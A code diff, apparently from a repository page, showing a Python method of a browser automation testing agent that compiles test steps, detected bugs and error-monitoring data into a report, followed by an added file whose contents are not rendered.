logger.info(f"Total steps: {total_steps}, Successful: {successful_steps}, Failed: {failed_steps}, Success rate: {success_rate:.1f}%")
|
| 468 |
+
|
| 469 |
+
# Get screenshots
|
| 470 |
+
screenshots = screenshot_capture.get_screenshots()
|
| 471 |
+
|
| 472 |
+
# Run advanced testing
|
| 473 |
+
logger.info("🧪 Starting advanced testing...")
|
| 474 |
+
advanced_test_results = []
|
| 475 |
+
enhanced_bugs = []
|
| 476 |
+
try:
|
| 477 |
+
if hasattr(self, 'browser_context') and self.browser_context:
|
| 478 |
+
logger.info("✅ Browser context found")
|
| 479 |
+
# Use the correct method to get a page from browser context
|
| 480 |
+
page = None
|
| 481 |
+
if hasattr(self.browser_context, 'new_page'):
|
| 482 |
+
logger.info("🔍 Trying to create new page...")
|
| 483 |
+
page = await self.browser_context.new_page()
|
| 484 |
+
elif hasattr(self.browser_context, 'pages') and self.browser_context.pages:
|
| 485 |
+
logger.info("🔍 Using existing page...")
|
| 486 |
+
page = self.browser_context.pages[0]
|
| 487 |
+
else:
|
| 488 |
+
# Try to get page from browser state
|
| 489 |
+
if hasattr(self.state, 'browser_state') and self.state.browser_state:
|
| 490 |
+
logger.info("🔍 Using page from browser state...")
|
| 491 |
+
page = self.state.browser_state.current_page
|
| 492 |
+
|
| 493 |
+
if page:
|
| 494 |
+
logger.info("✅ Page found, running advanced testing...")
|
| 495 |
+
# Run both advanced testing and enhanced AI testing
|
| 496 |
+
advanced_test_results = await advanced_testing_engine.run_comprehensive_testing(page)
|
| 497 |
+
logger.info(f"✅ Advanced testing completed: {len(advanced_test_results)} results")
|
| 498 |
+
|
| 499 |
+
enhanced_bugs = await self.enhanced_ai_testing_engine.run_comprehensive_testing(page)
|
| 500 |
+
logger.info(f"✅ Enhanced AI testing completed: {len(enhanced_bugs)} bugs found")
|
| 501 |
+
|
| 502 |
+
# Get errors from injected script
|
| 503 |
+
injected_errors = await self.error_monitor.get_injected_errors(page)
|
| 504 |
+
self.error_monitor.errors.extend(injected_errors)
|
| 505 |
+
logger.info(f"✅ Error monitoring completed: {len(injected_errors)} errors")
|
| 506 |
+
|
| 507 |
+
# Close page if we created it
|
| 508 |
+
if hasattr(self.browser_context, 'new_page'):
|
| 509 |
+
await page.close()
|
| 510 |
+
else:
|
| 511 |
+
logger.warning("❌ Could not get page for advanced testing")
|
| 512 |
+
else:
|
| 513 |
+
logger.warning("❌ No browser context found")
|
| 514 |
+
except Exception as e:
|
| 515 |
+
logger.warning(f"❌ Advanced testing failed: {e}")
|
| 516 |
+
import traceback
|
| 517 |
+
logger.warning(f"Advanced testing traceback: {traceback.format_exc()}")
|
| 518 |
+
|
| 519 |
+
# Get error monitoring data
|
| 520 |
+
try:
|
| 521 |
+
error_summary = self.error_monitor.get_error_summary()
|
| 522 |
+
all_errors = self.error_monitor.get_all_errors()
|
| 523 |
+
except Exception as e:
|
| 524 |
+
logger.warning(f"Error getting error monitoring data: {e}")
|
| 525 |
+
error_summary = {
|
| 526 |
+
'total_errors': 0,
|
| 527 |
+
'errors_by_type': {},
|
| 528 |
+
'errors_by_severity': {},
|
| 529 |
+
'console_errors': 0,
|
| 530 |
+
'js_errors': 0,
|
| 531 |
+
'network_errors': 0,
|
| 532 |
+
'dom_errors': 0,
|
| 533 |
+
'performance_issues': 0
|
| 534 |
+
}
|
| 535 |
+
all_errors = []
|
| 536 |
+
|
| 537 |
+
# Prepare test cases from execution steps
|
| 538 |
+
test_cases = []
|
| 539 |
+
for i, step in enumerate(steps, 1):
|
| 540 |
+
# Extract action type safely
|
| 541 |
+
action_type = "Unknown"
|
| 542 |
+
if hasattr(step, 'action') and step.action:
|
| 543 |
+
if hasattr(step.action, 'action_type'):
|
| 544 |
+
action_type = step.action.action_type
|
| 545 |
+
elif hasattr(step.action, '__class__'):
|
| 546 |
+
action_type = step.action.__class__.__name__
|
| 547 |
+
|
| 548 |
+
# Extract result information safely
|
| 549 |
+
result_text = "Completed"
|
| 550 |
+
error_message = None
|
| 551 |
+
is_success = True
|
| 552 |
+
|
| 553 |
+
if hasattr(step, 'result') and step.result:
|
| 554 |
+
is_success = getattr(step.result, 'success', True)
|
| 555 |
+
if hasattr(step.result, 'result') and step.result.result:
|
| 556 |
+
result_text = str(step.result.result)
|
| 557 |
+
if hasattr(step.result, 'error_message') and step.result.error_message:
|
| 558 |
+
error_message = str(step.result.error_message)
|
| 559 |
+
result_text = f"Failed: {error_message}"
|
| 560 |
+
|
| 561 |
+
# Extract duration safely
|
| 562 |
+
duration = "N/A"
|
| 563 |
+
if hasattr(step, 'duration') and step.duration:
|
| 564 |
+
duration = f"{step.duration:.2f} seconds"
|
| 565 |
+
|
| 566 |
+
test_case = {
|
| 567 |
+
"name": f"Step {i}: {action_type}",
|
| 568 |
+
"status": "PASSED" if is_success else "FAILED",
|
| 569 |
+
"duration": duration,
|
| 570 |
+
"description": f"Action: {action_type}",
|
| 571 |
+
"expected_result": "Action should complete successfully",
|
| 572 |
+
"actual_result": result_text,
|
| 573 |
+
"error_message": error_message
|
| 574 |
+
}
|
| 575 |
+
test_cases.append(test_case)
|
| 576 |
+
|
| 577 |
+
# Prepare bugs from failed steps and advanced testing
|
| 578 |
+
bugs = []
|
| 579 |
+
|
| 580 |
+
# Add bugs from failed steps
|
| 581 |
+
for step in steps:
|
| 582 |
+
if hasattr(step, 'result') and step.result and not getattr(step.result, 'success', True):
|
| 583 |
+
action_type = "Unknown"
|
| 584 |
+
if hasattr(step, 'action') and step.action:
|
| 585 |
+
if hasattr(step.action, 'action_type'):
|
| 586 |
+
action_type = step.action.action_type
|
| 587 |
+
elif hasattr(step.action, '__class__'):
|
| 588 |
+
action_type = step.action.__class__.__name__
|
| 589 |
+
|
| 590 |
+
error_message = "Unknown error"
|
| 591 |
+
if hasattr(step.result, 'error_message') and step.result.error_message:
|
| 592 |
+
error_message = str(step.result.error_message)
|
| 593 |
+
|
| 594 |
+
bug = {
|
| 595 |
+
"title": f"Test Failure: {action_type}",
|
| 596 |
+
"severity": "High" if "error" in error_message.lower() else "Medium",
|
| 597 |
+
"status": "Open",
|
| 598 |
+
"description": error_message,
|
| 599 |
+
"steps_to_reproduce": f"1. Execute action: {action_type}\n2. Check for errors",
|
| 600 |
+
"expected_behavior": "Action should complete successfully",
|
| 601 |
+
"actual_behavior": f"Action failed with error: {error_message}"
|
| 602 |
+
}
|
| 603 |
+
bugs.append(bug)
|
| 604 |
+
|
| 605 |
+
# Add bugs from advanced testing
|
| 606 |
+
for test_result in advanced_test_results:
|
| 607 |
+
if test_result.status in ["FAILED", "WARNING"]:
|
| 608 |
+
bug = {
|
| 609 |
+
"title": test_result.test_name,
|
| 610 |
+
"severity": "High" if test_result.status == "FAILED" else "Medium",
|
| 611 |
+
"status": "Open",
|
| 612 |
+
"description": test_result.description,
|
| 613 |
+
"steps_to_reproduce": f"1. Navigate to the page\n2. {test_result.description}",
|
| 614 |
+
"expected_behavior": "No security vulnerabilities or issues should be present",
|
| 615 |
+
"actual_behavior": test_result.description,
|
| 616 |
+
"recommendations": test_result.recommendations
|
| 617 |
+
}
|
| 618 |
+
bugs.append(bug)
|
| 619 |
+
|
| 620 |
+
# Add bugs from enhanced AI testing
|
| 621 |
+
for bug_report in enhanced_bugs:
|
| 622 |
+
bug = {
|
| 623 |
+
"title": bug_report.title,
|
| 624 |
+
"severity": bug_report.severity.value.title(),
|
| 625 |
+
"status": "Open",
|
| 626 |
+
"description": bug_report.description,
|
| 627 |
+
"steps_to_reproduce": bug_report.steps_to_reproduce,
|
| 628 |
+
"expected_behavior": bug_report.expected_behavior,
|
| 629 |
+
"actual_behavior": bug_report.actual_behavior,
|
| 630 |
+
"recommendations": bug_report.recommendations,
|
| 631 |
+
"url": bug_report.url,
|
| 632 |
+
"element_info": bug_report.element_info
|
| 633 |
+
}
|
| 634 |
+
bugs.append(bug)
|
| 635 |
+
|
| 636 |
+
# Add bugs from error monitoring
|
| 637 |
+
for error in all_errors:
|
| 638 |
+
if error.severity in ["high", "critical"]:
|
| 639 |
+
bug = {
|
| 640 |
+
"title": f"Error Detected: {error.error_type}",
|
| 641 |
+
"severity": "Critical" if error.severity == "critical" else "High",
|
| 642 |
+
"status": "Open",
|
| 643 |
+
"description": error.error_message,
|
| 644 |
+
"steps_to_reproduce": f"1. Navigate to {error.url}\n2. Monitor console/network for errors",
|
| 645 |
+
"expected_behavior": "No errors should occur during normal operation",
|
| 646 |
+
"actual_behavior": error.error_message,
|
| 647 |
+
"recommendations": [
|
| 648 |
+
"Check browser console for detailed error information",
|
| 649 |
+
"Verify network connectivity and server status",
|
| 650 |
+
"Review JavaScript code for potential issues",
|
| 651 |
+
"Implement proper error handling"
|
| 652 |
+
],
|
| 653 |
+
"error_context": error.context
|
| 654 |
+
}
|
| 655 |
+
bugs.append(bug)
|
| 656 |
+
|
| 657 |
+
# Prepare performance metrics
|
| 658 |
+
durations = []
|
| 659 |
+
for step in steps:
|
| 660 |
+
if hasattr(step, 'duration') and step.duration:
|
| 661 |
+
try:
|
| 662 |
+
durations.append(float(step.duration))
|
| 663 |
+
except (ValueError, TypeError):
|
| 664 |
+
pass
|
| 665 |
+
|
| 666 |
+
avg_duration = sum(durations) / len(durations) if durations else 0
|
| 667 |
+
max_duration = max(durations) if durations else 0
|
| 668 |
+
min_duration = min(durations) if durations else 0
|
| 669 |
+
|
| 670 |
+
# Get task information
|
| 671 |
+
task_description = "Unknown task"
|
| 672 |
+
if hasattr(self, 'task') and self.task:
|
| 673 |
+
task_description = str(self.task)
|
| 674 |
+
|
| 675 |
+
# Create comprehensive test data
|
| 676 |
+
test_data = {
|
| 677 |
+
"duration": f"{total_steps * 2} minutes", # Estimated
|
| 678 |
+
"total_tests": total_steps,
|
| 679 |
+
"passed_tests": successful_steps,
|
| 680 |
+
"failed_tests": failed_steps,
|
| 681 |
+
"error_tests": 0,
|
| 682 |
+
"success_rate": success_rate,
|
| 683 |
+
"passed_percentage": (successful_steps / total_steps * 100) if total_steps > 0 else 0,
|
| 684 |
+
"failed_percentage": (failed_steps / total_steps * 100) if total_steps > 0 else 0,
|
| 685 |
+
"error_percentage": 0,
|
| 686 |
+
"browser": "Chrome", # Default, could be extracted from browser config
|
| 687 |
+
"browser_version": "119.0.6045.105", # Default
|
| 688 |
+
"os": "Windows 10", # Default
|
| 689 |
+
"framework": "Fagun Browser Automation Testing Agent",
|
| 690 |
+
"execution_time": datetime.now().isoformat(),
|
| 691 |
+
"test_data_source": "Automated Test Execution",
|
| 692 |
+
"task_description": task_description,
|
| 693 |
+
"performance_metrics": {
|
| 694 |
+
"avg_response_time": f"{avg_duration:.2f} seconds",
|
| 695 |
+
"max_response_time": f"{max_duration:.2f} seconds",
|
| 696 |
+
"min_response_time": f"{min_duration:.2f} seconds"
|
| 697 |
+
},
|
| 698 |
+
"test_cases": test_cases,
|
| 699 |
+
"screenshots": screenshots,
|
| 700 |
+
"bugs": bugs,
|
| 701 |
+
"error_monitoring": {
|
| 702 |
+
"total_errors": error_summary['total_errors'],
|
| 703 |
+
"errors_by_type": error_summary['errors_by_type'],
|
| 704 |
+
"errors_by_severity": error_summary['errors_by_severity'],
|
| 705 |
+
"console_errors": error_summary['console_errors'],
|
| 706 |
+
"js_errors": error_summary['js_errors'],
|
| 707 |
+
"network_errors": error_summary['network_errors'],
|
| 708 |
+
"dom_errors": error_summary['dom_errors'],
|
| 709 |
+
"performance_issues": error_summary['performance_issues'],
|
| 710 |
+
"detailed_errors": [
|
| 711 |
+
{
|
| 712 |
+
"type": error.error_type,
|
| 713 |
+
"message": error.error_message,
|
| 714 |
+
"severity": error.severity,
|
| 715 |
+
"timestamp": error.timestamp.isoformat(),
|
| 716 |
+
"url": error.url,
|
| 717 |
+
"source": error.source,
|
| 718 |
+
"context": error.context
|
| 719 |
+
}
|
| 720 |
+
for error in all_errors
|
| 721 |
+
]
|
| 722 |
+
},
|
| 723 |
+
"key_findings": [
|
| 724 |
+
f"Executed {total_steps} test steps successfully",
|
| 725 |
+
f"Achieved {success_rate:.1f}% success rate",
|
| 726 |
+
f"Captured {len(screenshots)} screenshots during testing",
|
| 727 |
+
f"Identified {len(bugs)} issues requiring attention",
|
| 728 |
+
f"Task completed: {task_description[:100]}{'...' if len(task_description) > 100 else ''}",
|
| 729 |
+
f"Advanced testing: {len(advanced_test_results)} comprehensive tests performed",
|
| 730 |
+
f"Enhanced AI testing: {len(enhanced_bugs)} bugs found by AI agents",
|
| 731 |
+
f"Security tests: {len([r for r in advanced_test_results if r.test_type.value == 'security'])}",
|
| 732 |
+
f"Broken URL checks: {len([r for r in advanced_test_results if r.test_type.value == 'broken_url'])}",
|
| 733 |
+
f"Grammar checks: {len([r for r in advanced_test_results if r.test_type.value == 'grammar'])}",
|
| 734 |
+
f"Form tests: {len([r for r in advanced_test_results if r.test_type.value == 'form_testing'])}",
|
| 735 |
+
f"Error monitoring: {error_summary['total_errors']} errors detected",
|
| 736 |
+
f"Console errors: {error_summary['console_errors']}",
|
| 737 |
+
f"JavaScript errors: {error_summary['js_errors']}",
|
| 738 |
+
f"Network errors: {error_summary['network_errors']}",
|
| 739 |
+
f"Performance issues: {error_summary['performance_issues']}"
|
| 740 |
+
],
|
| 741 |
+
"recommendations": [
|
| 742 |
+
"Review failed test steps for potential improvements",
|
| 743 |
+
"Consider adding more error handling",
|
| 744 |
+
"Implement retry mechanisms for flaky tests",
|
| 745 |
+
"Regular monitoring of test execution performance"
|
| 746 |
+
],
|
| 747 |
+
"notes": [
|
| 748 |
+
"This report was generated automatically by the Fagun Browser Automation Testing Agent.",
|
| 749 |
+
"All test results are based on actual execution data.",
|
| 750 |
+
"For questions or clarifications, please contact the test automation team."
|
| 751 |
+
]
|
| 752 |
+
}
|
| 753 |
+
|
| 754 |
+
logger.info(f"✅ Test data preparation completed successfully!")
|
| 755 |
+
logger.info(f"📊 Final test data summary:")
|
| 756 |
+
logger.info(f" • Total tests: {total_steps}")
|
| 757 |
+
logger.info(f" • Passed tests: {successful_steps}")
|
| 758 |
+
logger.info(f" • Failed tests: {failed_steps}")
|
| 759 |
+
logger.info(f" • Success rate: {success_rate:.1f}%")
|
| 760 |
+
logger.info(f" • Bugs found: {len(bugs)}")
|
| 761 |
+
logger.info(f" • Test cases: {len(test_cases)}")
|
| 762 |
+
logger.info(f" • Enhanced AI bugs: {len(enhanced_bugs)}")
|
| 763 |
+
logger.info(f" • Advanced test results: {len(advanced_test_results)}")
|
| 764 |
+
|
| 765 |
+
return test_data
|
| 766 |
+
|
| 767 |
+
except Exception as e:
|
| 768 |
+
logger.error(f"Error preparing test data for report: {str(e)}")
|
| 769 |
+
import traceback
|
| 770 |
+
logger.error(f"Full traceback: {traceback.format_exc()}")
|
| 771 |
+
# Return minimal test data if preparation fails
|
| 772 |
+
return {
|
| 773 |
+
"duration": "Unknown",
|
| 774 |
+
"total_tests": 0,
|
| 775 |
+
"passed_tests": 0,
|
| 776 |
+
"failed_tests": 0,
|
| 777 |
+
"error_tests": 0,
|
| 778 |
+
"success_rate": 0,
|
| 779 |
+
"browser": "Unknown",
|
| 780 |
+
"test_cases": [],
|
| 781 |
+
"screenshots": [],
|
| 782 |
+
"bugs": [],
|
| 783 |
+
"key_findings": [f"Error preparing test data: {str(e)}"],
|
| 784 |
+
"recommendations": ["Check test execution logs"],
|
| 785 |
+
"notes": [f"Report generation encountered an error: {str(e)}"]
|
| 786 |
+
}
|
src/agent/deep_research/deep_research_agent.py
ADDED
|
@@ -0,0 +1,1276 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
